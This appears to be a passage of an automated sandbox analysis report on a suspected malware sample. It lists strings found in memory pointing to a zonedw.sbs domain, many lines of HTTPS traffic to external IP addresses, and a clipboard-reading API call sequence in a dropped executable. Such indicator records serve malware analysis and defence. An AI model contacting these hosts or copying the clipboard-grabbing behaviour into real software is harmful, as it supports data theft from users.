                          Source: 4508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/0
                          Source: 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/;V
                          Source: 4508a44a11.exe, 00000007.00000003.2382303961.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/L
                          Source: 4508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/OV
                          Source: 4508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/QV3I
                          Source: 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/WV)I
                          Source: 4508a44a11.exe, 00000007.00000002.3456117135.000000000071F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2382303961.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/eV
                          Source: 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/k
                          Source: 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/kV=I
                          Source: 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/yV
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://zonedw.sbsUA168GL
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://zonedw.sbsosh;
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50502
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50501
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50504
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50506
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50417 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50507
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50621
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50509
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50513
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50512
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50515
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50514
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50416 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50516
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50518
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50521 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50511
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50510
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50402
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50407
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50406
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50409
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50507 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50520
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50521
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50418 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50494
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50496
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50495
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50376 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50498
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50376
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50485 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50499
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50382
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50384
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50501 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50516 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50390
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50392
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50506 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50395
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50396
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50398
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50480 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50567 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50406 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50511 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50607
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50608
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50491 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50458
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50459
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50452
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50454
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50456
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50469
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50468
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50461
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50462
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50465
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50464
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50467
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50564 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50470
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50472 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50621 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50472
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50471
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50474
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50476
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50351 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50475
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50478
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50477
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50480
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50482
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50485
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50486
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50489
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50488
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50323 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50518 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50492
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50491
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50495 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50414
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50413
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50416
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50504 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50415
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50418
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50417
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50419
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50410
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50531
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50412
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50411
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50482 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50433 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50565 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50494 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50426
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50429
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50428
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50421
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50420
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50423
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50367 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50459 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50559
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50531 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50439
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50426 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50430
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50432
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50431
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50434
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50433
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50477 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50567
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50448
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50415 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50421 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50441
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50520 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50440
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50564
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50442
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50445
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50566
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50565
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50499 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 443
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49756 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.4:49764 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:49986 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:49987 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.82.93:443 -> 192.168.2.4:50249 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50256 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50257 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50273 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50294 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50323 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50345 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50351 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:50358 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50367 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50376 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50382 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.4:50384 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:50390 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.4:50392 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50396 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50413 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50418 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50414 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50415 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50429 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50430 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50448 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.4:50458 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50467 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50470 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50471 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50475 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50476 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50477 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50478 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50510 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50512 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50511 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50514 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50516 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50513 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50515 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50565 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50567 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50566 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50564 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_00431A30
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_00431A30
